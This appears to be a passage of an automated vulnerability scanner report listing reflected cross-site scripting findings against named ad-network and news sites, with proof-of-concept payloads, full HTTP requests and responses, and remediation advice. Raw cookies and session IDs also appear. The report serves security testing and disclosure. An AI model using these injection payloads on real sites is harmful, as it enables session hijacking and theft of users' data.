Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh31.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296924137.60|1296659685.66; dt=X; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 287
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 06 Feb 2011 20:54:00 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 08 Mar 2011 20:54:00 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1297025640.60|1296659685.66; Domain=.addthis.com; Expires=Tue, 05-Feb-2013 15:18:51 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 06 Feb 2011 20:54:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:54:00 GMT
Connection: close

_ate.ad.hpr49eb5<script>alert(1)</script>c7ecb15712e({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fwww.politicsdaily.com%2f%3f12b75"],"segments" : ["60"],"loc": "MjAwMDFOQ
...[SNIP]...

1.97. http://electronista.us.intellitxt.com/al.asp [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://electronista.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b6498%3balert(1)//8fbb8eb7701 was submitted in the jscallback parameter. This input was echoed as b6498;alert(1)//8fbb8eb7701 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ts=20110206203844&adid=0%2C126828&cc=us&di=29608951%2C29848200&hk=1&ipid=10231&mh=e096018077ddee628d1f0595aa706535&pid=2%2C2&pvm=21312d264a07f4ba843782fa6a49ed66&pvu=24D1B162B3D74248ACE40AC0B07FDF87&rcc=us&so=0&syid=0%2C0&uf=0%2C0&ur=0%2C0&kp=0%2C0%3B186%2C578%3B&prf=ll%3A670%7Cintl%3A889%7Cpreprochrome%3A3%7Cgetconchrome%3A58%7Ccontint%3A112%7Ccontl%3A1064%7Cadvint%3A118%7Cadvl%3A1183%7Ctl%3A1393&jscallback=$iTXT.js.callback4b6498%3balert(1)//8fbb8eb7701 HTTP/1.1
Host: electronista.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6wEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACssBAAAAAwAAAS33y8OgAAABLffa/2wAAAEt99tmFQAAD6YBAAAAAgAAAS332v9sAAABLffbZhUAAAroAQAAAAEAAAEt98vDoAAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAhI/yng--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wAAAAAAAAAAAAEKCAcz

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Type: text/javascript
Content-Length: 65
Date: Sun, 06 Feb 2011 20:37:47 GMT
Connection: close

try{$iTXT.js.callback4b6498;alert(1)//8fbb8eb7701();}catch(e){}

1.98. http://electronista.us.intellitxt.com/iframescript.jsp [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://electronista.us.intellitxt.com
Path:   /iframescript.jsp

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1da7"><script>alert(1)</script>24a46bbb395 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2784%2C329%2C2776%2C4004%26type%3Dscript%26ipid%3D10231%26sfid%3D0e1da7"><script>alert(1)</script>24a46bbb395 HTTP/1.1
Host: electronista.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6wEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACssBAAAAAwAAAS33y8OgAAABLffa/2wAAAEt99tmFQAAD6YBAAAAAgAAAS332v9sAAABLffbZhUAAAroAQAAAAEAAAEt98vDoAAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAhI/yng--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wAAAAAAAAAAAAEKCAcz

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Type: text/html
Content-Length: 204
Date: Sun, 06 Feb 2011 20:37:40 GMT
Connection: close

<html><body><script src="http://pixel.intellitxt.com/pixel.jsp?id=2784,329,2776,4004&type=script&ipid=10231&sfid=0e1da7"><script>alert(1)</script>24a46bbb395" language="javascript"></script></body></h
...[SNIP]...

1.99. http://electronista.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://electronista.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e22c2'-alert(1)-'8d2186b5fd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=10231&e22c2'-alert(1)-'8d2186b5fd6=1 HTTP/1.1
Host: electronista.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wkAAAEt+/O1yQA-"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEPqgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Thu, 07-Apr-2011 20:36:58 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEPqgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Thu, 07-Apr-2011 20:36:58 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 20:36:58 GMT
Connection: close
Content-Length: 10716

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
qoptions={tags:"889.5259.10231"};_qacct="p-fdwEfW0hIeH9U";$iTXT.js.load("http://edge.quantserve.com/quant.js");$iTXT.js.serverUrl='http://electronista.us.intellitxt.com';$iTXT.js.pageQuery='ipid=10231&e22c2'-alert(1)-'8d2186b5fd6=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

1.100. http://electronista.us.intellitxt.com/v4/advert [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://electronista.us.intellitxt.com
Path:   /v4/advert

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1c7b2%3balert(1)//fc98b5440bb was submitted in the jscallback parameter. This input was echoed as 1c7b2;alert(1)//fc98b5440bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/advert?ts=1297024724535&refurl=http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec3b351ab889%3D1&sid=e096018077ddee628d1f0595aa706535&pvu=24D1B162B3D74248ACE40AC0B07FDF87&pvm=21312d264a07f4ba843782fa6a49ed66&ipid=10231&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&dat=61%2C69%2C67%2C17%2C25%2C13%2C62%2C26%2C11%2C34%2C4%2C12%2C50%2C51%2C18%2C61&jscallback=$iTXT.js.callback31c7b2%3balert(1)//fc98b5440bb HTTP/1.1
Host: electronista.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEMMAA-"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wAAAAAAAAAAAAEKCAcz; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 20:37:42 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 20:37:41 GMT
Connection: close
Content-Length: 4915

(function(){var nh = new $iTXT.ui.Hook({value: "iphone",uid: "681C2C358D4E49A28512ECFA3DED1626",uidh: "5b94fa4e6337160336acb19c5caaf7ed",advert: (function(){var ad = new $iTXT.data.Advert('$iTXT.tmpl.
...[SNIP]...
XT.glob.track.hook'));$iTXT.glob.track.hook.push(new $iTXT.data.Pixel(19827374,'iphone','http://pixel.intellitxt.com/pixel.jsp?id=2776&type=script',true,'$iTXT.glob.track.hook'));try{$iTXT.js.callback31c7b2;alert(1)//fc98b5440bb();}catch(e){}

1.101. http://electronista.us.intellitxt.com/v4/context [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://electronista.us.intellitxt.com
Path:   /v4/context

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e242d%3balert(1)//f9ad150e83d was submitted in the jscallback parameter. This input was echoed as e242d;alert(1)//f9ad150e83d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/context?ts=1297024724423&refurl=http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec3b351ab889%3D1&sid=e096018077ddee628d1f0595aa706535&pvu=24D1B162B3D74248ACE40AC0B07FDF87&pvm=21312d264a07f4ba843782fa6a49ed66&ipid=10231&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&dat=61%2C69%2C67%2C17%2C25%2C13%2C62%2C26%2C11%2C34%2C4%2C12%2C50%2C51%2C18%2C61&pagecl=18113&jsoncl=1262&ppc=-1&hn=7&chunkkey=10231:e096018077ddee628d1f0595aa706535:4CD59B7A613C41A19879C8AC98480C80:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A1%2Cc%3A%22We%20have%20noticed%20that%20you%20are%20using%20iPhone%20for%20browsing%20our%20website.%20Would%20you%20like%20to%20browse%20our%22%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A2%2Cc%3A%22Toshiba%20has%20sold%20about%20half%20of%20what%20it%20expected%20to%20of%20its%22%7D%2C%7Bt%3A%22std%22%2Cn%3A3%2Cc%3A%22in%20Japan%2C%22%7D%2C%7Bt%3A%22std%22%2Cn%3A4%2Cc%3A%22Masaaki%20Osumi%2C%20the%20president%20of%20Toshiba%25E2%2580%2599s%20Visual%20Products%20Company.%20Only%20500%20of%20the%2020-inch%2C%20%242%2C490%20set%20were%20sold%20in%20the%20first%20month%20and%20even%20less%20of%20the%20less%20expensive%2012-inch%20model.%20Toshiba%20expected%20to%20move%201%2C000%20of%20each%20model%20during%20their%20first%20month%20of%20sales.%22%7D%5D%7D%2C%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A5%2Cc%3A%22Osumi%20continued%2C%20saying%20the%20company%20needs%20to%20offer%20larger%20sizes%20of%20the%20sets%20in%20order%20to%20boost%20sales.%20Technical%20challenges%20need%20to%20be%20overcome%20first%2C%20however%2C%20before%20the%20company%20can%20do%20so%20in%20the%20second%20half%20of%20the%20year.%22%7D%2C%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A6%2Cc%3A%22To%20creat&chunk=0&total=2&jscallback=$iTXT.js.callback1e242d%3balert(1)//f9ad150e83d HTTP/1.1
Host: electronista.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEMMAA-"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Content-Length: 63
Date: Sun, 06 Feb 2011 20:37:42 GMT
Connection: close

try{$iTXT.js.callback1e242d;alert(1)//f9ad150e83d();}catch(e){}

1.102. http://electronista.us.intellitxt.com/v4/init [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://electronista.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ea68b%3balert(1)//0780825101d was submitted in the jscallback parameter. This input was echoed as ea68b;alert(1)//0780825101d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1297024724141&pagecl=18113&fv=10&muid=&refurl=http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec3b351ab889%3D1&ipid=10231&jscallback=$iTXT.js.callback0ea68b%3balert(1)//0780825101d HTTP/1.1
Host: electronista.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEMMAA-"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wAAAAAAAAAAAAEKCAcz; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 20:37:44 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 20:37:43 GMT
Content-Length: 11484

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback0ea68b;alert(1)//0780825101d({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

1.103. http://electronista.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://electronista.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbbb8"-alert(1)-"b15924c4453 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1297024724141&pagecl=18113&fv=10&muid=&refurl=http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec3b351ab889%3D1&ipid=10231&jscallback=$iTXT.js.callback0&fbbb8"-alert(1)-"b15924c4453=1 HTTP/1.1
Host: electronista.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63woAAAEt/LEMMAA-"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wAAAAAAAAAAAAEKCAcz; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 20:37:44 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 20:37:43 GMT
Content-Length: 11465

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
k0","reg":"tx","refurl":"http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889\u003d1","fbbb8"-alert(1)-"b15924c4453":"1","rcc":"us","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.params){$iTXT.glob.params=new $iTXT.data.Param($iTXT.glob.dbgParams,undefined,undefined,'CHANNEL');}
...[SNIP]...

1.104. http://es.engadget.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://es.engadget.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cedc8"-alert(1)-"2d1d201c850 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cedc8"-alert(1)-"2d1d201c850=1 HTTP/1.1
Host: es.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:22:41 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=16bc50a63470ff01e195d9e3bc2eeb6b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=60
Pragma: no-cache
Keep-Alive: timeout=5, max=999994
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 106129

